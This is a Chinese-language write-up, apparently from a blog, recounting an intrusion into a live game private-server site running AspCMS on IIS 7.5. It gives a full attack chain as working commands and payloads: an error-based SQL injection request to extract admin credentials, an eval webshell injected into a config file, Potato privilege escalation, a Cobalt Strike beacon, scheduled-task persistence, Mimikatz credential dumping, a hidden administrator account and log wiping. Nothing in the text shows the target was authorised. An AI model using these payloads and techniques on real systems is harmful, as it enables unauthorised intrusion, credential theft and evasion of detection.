从游戏私服后台到服务器权限：一次基于AspCMS的实战渗透记录（含IIS7.5绕过技巧）

从游戏私服后台到服务器权限一次基于AspCMS的实战渗透记录深夜的渗透测试总是充满意外收获。当我在FOFA搜索引擎中输入特定关键词时一个游戏私服宣传站引起了我的注意——它使用的正是我熟悉的AspCMS系统。这种老旧的CMS系统往往隐藏着不少安全隐患而这次渗透过程恰好展示了从外部侦察到最终获取服务器控制权的完整链条。1. 目标识别与信息收集渗透测试的第一步永远是充分的信息收集。在这个案例中目标网站看似普通的游戏私服宣传页面但几个关键特征暴露了它的脆弱性使用AspCMS 2.0版本通过页面底部版权信息确认服务器运行在Windows Server 2008 R2系统上采用IIS 7.5作为Web服务器资产测绘工具的使用技巧# FOFA搜索语法示例 title游戏私服 serverMicrosoft-IIS/7.5通过简单的目录爆破我很快发现了后台管理路径。AspCMS系统的后台路径通常有以下几种常见变体常见后台路径出现频率/admin/45%/manage/30%/cms/15%/backend/10%提示在实际渗透中建议使用Burp Suite的Intruder模块配合常见后台路径字典进行自动化探测。2. 漏洞利用与后台突破成功访问后台后发现这个AspCMS版本存在两个关键漏洞未授权访问漏洞特定管理页面未进行权限验证SQL注入漏洞参数过滤不严导致注入可能利用这两个漏洞的组合可以绕过登录直接获取管理员凭证。以下是具体的利用步骤访问/admin/_content/_About/AspCms_AboutEdit.asp页面构造特殊参数触发SQL注入GET /admin/_content/_About/AspCms_AboutEdit.asp?id1%20AND%201CONVERT(int,(SELECT%20username%2B%27:%27%2Bpassword%20FROM%20AspCms_Admin%20WHERE%20id1)) HTTP/1.1从错误信息中提取管理员账号密码注意不同版本的AspCMS可能需要调整注入语句建议先在测试环境验证。3. IIS 7.5环境下的Webshell获取获取后台权限后传统方法是在模板管理中插入恶意代码。但新版本AspCMS限制了模板文件类型且IIS 7.5不再支持经典的解析漏洞。这时需要另辟蹊径进入扩展功能→幻灯片设置→幻灯样式使用浏览器开发者工具修改slidestyle的value值为1%%Eval(Request(chr(65)))%%保存后Webshell将写入/config/AspCms_Config.asp使用中国菜刀连接密码为a常见问题排查如果服务器返回500错误可能是代码格式错误确保IIS对/config目录有写入权限某些安全软件会拦截eval等危险函数调用4. 权限提升与持久化控制获取Webshell后执行whoami发现只是普通用户权限。通过以下步骤实现提权检查系统进程tasklist /svc确认无杀毒软件运行上传Potato提权工具.\potato.exe -cmd whoami成功获取SYSTEM权限后部署Cobalt Strike beacon# 生成payload ./agscript 192.168.1.100 50050 myteam password generate -f exe -o payload.exe通过计划任务建立持久化schtasks /create /tn Update /tr C:\payload.exe /sc hourly /mo 1权限维持的进阶技巧使用Mimikatz提取凭证mimikatz.exe privilege::debug sekurlsa::logonpasswords exit创建隐藏账户net user backup$ Pssw0rd /add net localgroup administrators backup$ /add清除日志痕迹wevtutil cl security wevtutil cl system整个渗透过程展示了如何将多个中低危漏洞串联起来最终形成完整的攻击链。特别值得注意的是在IIS 7.5环境下通过修改配置文件获取Webshell的方法比传统文件上传更为可靠。